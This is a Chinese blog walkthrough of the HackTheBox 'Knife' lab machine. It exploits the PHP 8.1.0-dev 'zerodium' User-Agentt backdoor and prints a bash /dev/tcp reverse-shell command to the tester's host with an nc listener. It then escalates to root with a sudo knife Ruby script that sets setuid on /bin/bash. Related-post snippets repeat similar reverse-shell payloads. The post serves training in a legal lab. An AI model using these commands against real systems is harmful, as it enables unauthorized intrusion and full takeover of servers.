HackTheBox-Knife

最新推荐文章于 2024-01-24 23:12:09 发布
最新推荐文章于 2024-01-24 23:12:09 发布
阅读量338 收藏
点赞数
分类专栏: hack the box 文章标签: php ssh hacks 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26947429/article/details/119930202
版权

今天我们来打hack the box里面的靶场

1,首先连接openvpn实现访问到靶机
在这里插入图片描述
ping一下靶机地址测试网络连通
在这里插入图片描述
2,nmap来扫描服务器开了什么端口
在这里插入图片描述
从这里可以看出靶机开了22和80端口,随手试了几个ssh的弱口令没啥用,只能从80端口入手了,先访问网站
在这里插入图片描述
首页没发现可以利用的地方,再用dirsearch扫一波目录
在这里插入图片描述
在这里插入图片描述
扫描出来的目录访问之后没啥作用
3,我们来识别一波CMS用kali的whatweb来识别一波
在这里插入图片描述
这里看到了X-Powered-By[PHP/8.1.0-dev]不同寻常百度之后果然有问题,X-Powered-By是响应头里面的内容会泄露php的版本信息,而PHP/8.1.0-dev这个版本的php会有一个后门
漏洞描述
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。
4,这边我们直接抓包并发送到重发器试试命令执行的结果

User-Agentt: zerodiumsystem("ifconfig");

在这里插入图片描述
现在就好办了直接反弹shell
本机vpn的ip
在这里插入图片描述

bash -c 'exec bash -i &>/dev/tcp/10.10.14.3/4444 <&1'

而我们在本机用执行nc监听端口

nc -nvlp 4444

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5,得到反弹的shell,权限并不高而且nc的shell好用,所以用python来得到一个更好用的的shell,好多语言都可以调用shell你现在linux系统基本自带python所以python更加方便

python -c 'import pty; pty.spawn("/bin/bash")'

which python可以查看有没有python语言环境,这里有python3环境

在这里插入图片描述
我们执行语句获取shell
在这里插入图片描述
6,此用户权限较低,我们来提权

sudo -l可以知道我们了不用root密码来执行某些文件

在这里插入图片描述
这边可以无密执行/usr/bin/knife文件
查看文件发现是ruby脚本的文件
在这里插入图片描述
搜索了一下这个文件是一个ruby的包运行之后提示需要传递一个子命令
在这里插入图片描述
这边是个setuid的提权,我找的了一个大佬的解释:
setuid
setuid是类unix系统提供的一个标志位, 其实际意义是set一个process的euid为这个可执行文件或程序的拥有者(比如root)的uid, 也就是说当setuid位被设置之后, 当文件或程序(统称为executable)被执行时, 操作系统会赋予文件所有者的权限, 因为其euid是文件所有者的uid.
举个例子
setuid的方法是使用Linux的chmod指令,我们都习惯给予一个文件类似“0750” “0644” 之类的权限,它们的最高位0就是setuid的位置, 我们可以通过将其设为4来设置setuid位。(tips:设置为2为setgid,同setuid类似,即赋予文件所在组的权限)。

chmod 4750 文件名
or
chmod u+s 文件名

在这个命令执行之后, 我们再通过ls -l命令查看文件时, 可以发现文件owner权限的x 位变成了s ,这就说明setuid权限已经被设置, 之后任何user执行这个文件时(user需要有文件的执行权限), 都会以root的权限运行(此文件的owner为root)。 所以,针对一个需要被很多user以root权限执行的文件, 我们可以通过setuid来进行操作, 这样就不必为所有user都添加sudo 命令。

tips
在使用setuid时, 需要保证此文件有被执行的权限(x), 如果没有执行权限。 在使用ls -l查看权限时, 会发现setuid位被设置为了大写的S, 这说明setuid位没有被设置成功。
————————————————
原文链接:https://blog.csdn.net/weixin_44575881/article/details/86552016

7,这边继续来提权,ruby执行命令方法exec,system,和%x
我们写一个赋予/bin/bash setuid的脚本

echo “system(‘chmod +s /bin/bash’)> j.rb

在这里插入图片描述

我们james用户具有执行knife的权限并且是以root权限运行,所以写一个脚本来给/bin/bash/赋予setuid位

sudo /usr/bin/knife exec j.rb通过knife执行我们写的脚本

在这里插入图片描述
🐖

sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具

/bin/bash -p

–posix 这个指令是需要用到root权限的,由于设置了setuid所以实现了提权
在这里插入图片描述

这样就可以拿到两个flag了
在这里插入图片描述
最后提交拿到胜利!!
在这里插入图片描述

rurald
关注
专栏目录
paddle 56 将图像分类模型嵌入到目标检测中并实现端到端的部署(用图像分类模型进行目标检测切片分类)
a486259的博客
12-24 1422
目标检测在功能上一直是涵盖了图像分类的,其包含目标切片检测,目标切片分类。由于某些原因,需要将目标检测的功能退化为检测,忽略其切片分类,使用外部的分类模型。然而这样操作会使得其与原始的部署代码不兼容,为此博主实现将图像分类模型嵌入到目标检测中,并实现端到端的部署。这里以ppyoloe模型为改造案例,关于图像分类模型可以使用任意PaddleClas支持的模型。关于构造PaddleClas模型可以查阅。
测试集(2)-words
热门推荐
马如林的IT博客
11-26 5万+
 aa.ma.mabandonabandonabattoirabilityabilityableableabnormalabnormalaboardaboardaboutaboutaboveaboveabracadabraabroadabroadabsenceabsenceabsentabsent
连接Hack The Box靶场教程
最新发布
Atopos545的博客
01-24 1285
进去后选好节点,随便选一个就行。免费的就是下载对方vpn并连接,付费的就直接开启一个Pwnbox,我就用的是免费的,这里只介绍免费的方法。下好后把文件放到kali虚拟机里面,创建一个文件放进去就可以了,或者放桌面都行,就看你启动的时候方不方便。之后在终端启动openvpn,就刚才放进kali的文件。新手都是从Starting Point开始的,这里就以这个为例,其他的复刻一下这个步骤就好了。这三种分别对应左边的三种靶机,你要打那个靶机就去开启那个靶机对应的vpn。这样就可以尽情的去打靶,去渗透了!
Hack the Box Knife 靶机渗透
Shadow的博客
07-23 281
Knife靶机渗透 目标:得到root权限,取得user.txt,root.txt 作者:shadow 时间:2021-07-23 请注意:我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。 一、信息收集 Nikto查看漏洞,发现php版本8.1.0 查找是否有已知漏洞exploit PHP 8.1.0-dev版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通..
Hack the box knife
qq_41696858的博客
07-15 155
1.nmap -sC -sV 10.10.10.242 //常规扫 22,80端口 2.wappalyzer扫指纹 注意到PHP版本是8.1.0-dev 这个版本的PHP最近被爆出来存在远程代码执行漏洞 具体看这个:https://zhuanlan.zhihu.com/p/381142917 直接上payload User-Agentt: zerodiumsystem("/bin/bash -c ‘bash -i >&/dev/tcp/10.10.14.113/6666 0>&1
HackTheBox-Knife靶场实战
qq_36584013的博客
05-26 630
HackTheBox-Knife靶场实战 靶场信息 信息搜集 首先使用nmap进行端口扫描 我们得知开启了22和80端口 出于能不爆破就不爆破的原则,先访问80端口看一下 80端口上的内容有点不明所以。 在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁点收获,连robots.txt页面也不存在。 我的思路就卡在这里了,一时之间不知道应该...
TensorFlow-Keras预训练模型测试
信道者
07-06 1万+
在tf.keras.applications里有多个预训练的模型类。这些类继承了tf.keras.Model类,使用比较方便。在实例化这些类之后,程序会自动下载参数,存储于本地硬盘。本文测试了这些预训练模型,并发现测试结果普遍差于论文声称结果。
TensorFlow北大公开课学习笔记8-复现vgg16并实现图片识别
qq_37791134的博客
11-06 3730
https://www.cs.toronto.edu/~frossard/post/vgg16/ 】img_ready = re_img.reshape((1, 224, 224, 3)) ValueError: cannot reshape array of size 200704 into shape (1,224,224,3)因为图片是四通道的,为啥?224*334*4=200704 ...
python瓦登尔湖词频统计
weixin_30500105的博客
11-01 5656
#瓦登尔湖词频统计: import string path = 'D:/python3/Walden.txt' with open(path,'r',encoding= 'utf-8') as text: words = [raw_word.strip(string.punctuation).lower() for raw_word in text.read().split()...
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6871
Hack The Box,一款有意思的渗透测试平台
Hack The Box——AI
江左盟的博客
02-28 942
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 总结 简介 这是一个比较有创意、考验脑洞的靶机(可能是我见识少),难度主要集中在漏洞发现部分。我按一般逻辑进行渗透,在发现文件上传点和两个文件(db.php和intelligence.php)之后,尝试绕过上传无果,只好借助强大的Google进行寻找思路了,原来是通过上传的wav音频文件进行SQL注入,然后获取用户名和密码通过SS...
渗透测试平台【Hack The Box】获取邀请码与注册讲解
爱国小白帽
12-08 4568
Hack The Box 官方网址:hackthebox.eu/ : 注册鏈接 这里需要填写邀请码,想想会在哪里呢? 第一步肯定是打开F12,查看网络,发现有inviteapi.min.js inviteapi.min.js的全拼是邀请人的意思,答案会不会在这里呢?我们双击打开 然后跳到了这样的页面,发现有makeInviteCode这样的函数 百度翻译是生成邀请代码的意思,答案是这没...
hackthebox】【Challenges】【Lernaean】
大方子
02-01 1373
一个来自HTB的web挑战 提示语:你的目标对计算机不是很好。尝试并猜测他们的密码,看看他们是否隐藏任何东西! 打开页面,出现“Please do not try to guess my password!” 那么我们用hydra来爆破下 hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 docker.hackth...
HackTheBox-Return
网安星空
01-28 450
本次记录的是HTB Tracks 系列的 Intro to Printer Exploitation,即打印机相关漏洞的场景合集。随着攻防对抗的升级,打印机也成了的攻击目标之一。研究表明,打印机存在较多攻击面,使它们很容易遭受攻击。本次靶机为Return,涉及到域控安全、打印机安全等知识点。
0x11-HackTheBox-Beep
0pr
05-26 389
目录 历史命令 目标 能学到什么? 什么是 Elastix? 什么是 FreePBX? Elastix FreePBX 远程代码执行漏洞 Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.p
Hack the box靶机 nineveh
菜浪马废的博客
05-20 433
添加10.10.10.43 nineveh.htb 到/etc/hosts 扫描网站目录 发现一个登录页面 直接hydra爆破账号 admin:1q2w3e4r5t 继续hydra admin:password123 查看漏洞 没有返回 好像是必须在名称中包含ninevehNotes 可以了现在 nc连接 php -r ‘$sock=fsockopen(“10.10.16.118”,1234);exec("/bin/sh -i <&3 >&3 2&gt.
解决kali访问HackTheBox网络不稳定
peanut_trees的博客
07-07 2698
kali访问HackTheBox网络不稳定 HackTheBox作为一个靶场有着很多有意思的环境,官方推荐最好在虚拟机里搞,这里选择了kali,毕竟集成工具多,方便渗透。 Kali的网络可能会不稳定,解决办法如下: 修改ovpn文件 更改proto udp为proto tcp 更改remote {serverAddressHere} 1337为remote {serverAddressHere} 443 更改<tls-auth>为<tls-crypt> 更改</tls-auth
cloud-nacos-gateway-knife4j:swagger聚合文档!使用技术为:spring cloud + nac...
07-15
综上所述,cloud-nacos-gateway-knife4j:swagger聚合文档使用了Spring Cloud、Nacos、Gateway和Knife4j等技术,通过Spring Cloud构建和管理微服务,使用Nacos实现服务注册与发现,通过Gateway实现统一的请求分发和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值